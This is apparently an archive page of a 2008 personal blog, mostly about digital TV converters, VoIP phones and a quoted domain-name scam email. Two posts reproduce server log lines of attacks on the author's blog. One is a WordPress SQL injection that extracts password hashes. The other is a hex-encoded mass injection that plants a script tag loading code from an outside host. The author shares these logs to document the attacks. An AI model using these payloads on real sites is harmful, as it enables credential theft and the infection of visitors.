Channel Master CM-7000: Stunning digital TV

I hooked up our new Channel Master CM-7000 digital TV converter last night and was I amazed. The picture is stunning! It makes the picture we got with analog cable look like total crap! In fact, it may even be better than digital cable as digital cable takes an already-compressed MPEG signal (the ATSC broadcast signal) and recompresses it with QAM. Compressing the same data with two different algorithms always diminishes the quality of the data.

Setup was a snap, too. I simply hooked up the antenna cable, the SVGA cable, and a patch cable for stereo audio. Then a few clicks on the on-screen display and it automatically searched for and added all the available digital channels. It was a total breeze. The antenna I used was an old “rabbit-ears” antenna, too. I haven’t even hooked up the big honking attic antenna to it yet.
Continue reading →

White space

Yesterday we got our Channel Master CM-7000 digital TV converter box, which makes our older Sony TV digital-ready. I unpacked everything but due to the lack of sleep I got Tuesday night I didn’t feel up to connecting it. So I’m one step away from being digital TV-ready.

And not a moment too soon. Lost in the election noise was news of the FCC’s approval of new, unlicensed bandwidth. Called white space, these frequencies have for decades acted as buffers between analog television channels but thanks to February’s upcoming digital TV transition this bandwidth will become available for new and novel uses.
Continue reading →

Cheap Thoughts: On-demand escalators

Something caught my eye when I walked by the empty Raleigh Convention Center last night: every escalator in the place was chugging along though there was no one in the building.

What a bunch of wasted electricity! These are hefty machines and they’re left running? And though it would be an improvement if someone would come by and manually shut them off, what would be even better would be to give the escalators the ability to turn themselves on when needed.
Continue reading →

Digital TV ready

I spent a moment this morning doing some research on which digital TV converter box to buy. We’ve got an HDTV but also have a standard-definition TV which is is very good condition.

Wikipedia made it easy with a handy comparison chart. It seems that very few of these converter boxes (a large group of which are known as Coupon-Eligible Converter Boxes or CECBs as they qualify for the $40 government subsidy) sport S-video outputs. The clearest input for my analog TV, a mid-90s model Sony, is its S-video input. To me it doesn’t make sense to have a box convert from a perfect digital signal to an analog output if that analog output isn’t going to be at least S-video quality.
Continue reading →

Polycom and Cisco VoIP phones compared

So $WORK ordered a new Cisco phone system to replace the Asterisk-based one I put together. Never mind that the Asterisk system cost 1/5th what the Cisco one costs and was set up in a day while the Cisco one in our German office still isn’t working properly after a month of configuration. Hey, its not my money, so I can’t really argue.

My office is getting this new system, too, but I’ve been leaving the set up of this system to the outside consultant $BIGBOSS hired. Still, I couldn’t help but figure out what it took to configure the Cisco 7965 phone to talk to our soon-to-be-replaced Asterisk system.
Continue reading →

AsiaDNR and the domain name scam

The same domain name scam as the one I mentioned previously is still happening. This morning I got an email at $WORK from a company called AsiaDNR. An email from steven@scdomain.org tried to say all of $WORK’s Asia domain names were being registered:

Dear CEO,

We are the domain name registration organization in HongKong, which is the domain name registrar centre in Asia. We have something important need to confirm with your company.

we formally received an application on October 19 2008.One company who called Carnelian Investment Company are applying for following:

Domain Names:
$WORK.kr
$WORK.jp
$WORK.my
$WORK.ph
$WORK.net.cn
$WORK.org.cn
$WORK.com.hk
$WORK.com.tw

Internet Brand Name:
$WORK

These days we are dealing with it, After our initial examination, we found that the internet brand name and domain names applied for registration are as same as your company’s name and trademark. hope to get the affirmation of your company because that may relate to your intellectual property on internet. Now we have not finished the registration of Carnelian Investment Company yet, in order to deal with this issue better, please let someone who is responsible for trademark or domain name contact me as soon as possible.

Best Regards,

Steven
————————————————————————————————————————

Domain Name Auditing and Registration Manager.
Hong Kong Office:
Tel:00852 9566 0103
00852 9566 0205

Fax:00852-82261055
Email:steven@scdomain.org

Website: http://www.domaininasia.com
————————————————————————————————————————
————————————————————————————————————————
Confidentiality Notice. This is a letter for confirmation. If the mentioned third party is your business partner or distributor in ASIA please DO NOT reply. We will automatically confirm application from your business partner after this audit procedure. we have to notify you, and our registration organization are not responsible for any dispute questions about trade mark, intellectual property nor patent after they succeed in registration.hope you can understand.thank you.

Be forewarned: if you take them up on their “offer,” you’ll be buying and endless number of domain names!

For the sake of the search engines, here’s a list of fake company names used in the scam that I’ve been able to track down (humans might want to just quit reading here):
Continue reading →

USB camera platforms

Here’s one for my fellow Linux geeks, particularly the ones who enjoy embedded Linux.

I’m looking to deploy a number of USB streaming cameras for a security project. I would like these cameras to use whatever network is available to stream high-quality video to a central server. I would like these camera platforms to be maintainable from the network. I also want the camera platform to be as unobtrusive on the host network as possible (though stealth is not required).

The hardware must run Linux, it must have at least one network port (wired and/or wireless), and it must have at least one USB port.

My question to you, fellow hackers, is this: what hardware would you use? I know a Linksys NSLU2 would work but what other hardware might work?

More webserver attacks

Just logged a few of these. Seems this attack has been discussed online before, but surprisingly there’s little information on it.

Note the attempt to get the user passwords from the wp_users table:

216.83.63.254 – – [03/Oct/2008:14:30:38 -0400] “GET /xmlrpc.php HTTP/1.1” 200 42
“-” “Mozilla/4.0 (k1b compatible; rss 6.0; Windows Sot 5.1 Security Kol)”
216.83.63.254 – – [03/Oct/2008:14:30:39 -0400] “POST /xmlrpc.php HTTP/1.1” 403 9
70 “-” “Mozilla/4.0 (k1b compatible; rss 6.0; Windows Sot 5.1 Security Kol)”
216.83.63.254 – – [03/Oct/2008:14:30:47 -0400] “POST /wp-trackback.php?tb_id=1 H
TTP/1.1” 403 984 “-” “Mozilla/4.0 (k1b compatible; rss 6.0; Windows Sot 5.1 Security Kol)”
216.83.63.254 – – [03/Oct/2008:14:30:54 -0400] “GET /index.php?cat=%2527+UNION+S
ELECT+CONCAT(666,CHAR(58),user_pass,CHAR(58),666,CHAR(58))+FROM+wp_users+where+i
d=1/* HTTP/1.1” 403 295 “-” “Mozilla/4.0 (k1b compatible; rss 6.0; Windows Sot 5.1 Security Kol)”
216.83.63.254 – – [03/Oct/2008:14:30:55 -0400] “GET /index.php?cat=999+UNION+SEL
ECT+null,CONCAT(666,CHAR(58),user_pass,CHAR(58),666,CHAR(58)),null,null,null+FRO
M+wp_users+where+id=1/* HTTP/1.1” 403 295 “-” “Mozilla/4.0 (k1b compatible; rss
6.0; Windows Sot 5.1 Security Kol)”
216.83.63.254 – – [03/Oct/2008:14:30:55 -0400] “GET /wp-trackback.php?p=1 HTTP/1
.1” 200 135 “-” “Mozilla/4.0 (k1b compatible; rss 6.0; Windows Sot 5.1 Security Kol)”

Blog SQL injection attack

I’ve been logging a few attacks on my blog site which put the following into the logfiles:

163.19.104.88 – – [02/Oct/2008:05:57:15 -0400] “GET /?’;DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777332E73733131716E2E636E2F63737273732F6E65772E68746D223E3C2F7363726970743E3C212D2D27272B5B272B40432B275D20776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777332E73733131716E2E636E2F63737273732F6E65772E68746D223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S); HTTP/1.1” 200 42469 “-” “Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)”

Turns out its a SQL injection attack which is allegedly being carried out by a criminal gang called Rock Phish (or its being carried out by two teenagers pretending to be a “gang”). The attack uses WAITFOR DELAY to see if it worked or not. The user agent and IP addresses change for each attack, so one has to be clever in defending against it. I’ve been blocking the IP when it comes up, but that becomes impractical after a while.
Continue reading →

Outlook: snarky

When my officemate threw up his hands in frustration one time too many after Microsoft Outlook crashed, I felt the need to send a happygram to Bill Gates. Feeling prankish, I rattled off this email:

—–Original Message—–
From: Mark Turner [mailto:jmarkturner at blah blah blah . com]
Sent: Monday, September 29, 2008 00:23 AM
To: Bill Gates
Subject: Thanks!

Mr. Gates,

Thanks so much for creating Microsoft Outlook. My life is so much better because of it.

Best Regards,

Mark Turner
Raleigh, NC

I about fell out of my chair laughing when I got this response back from his administrative staff just now:
Continue reading →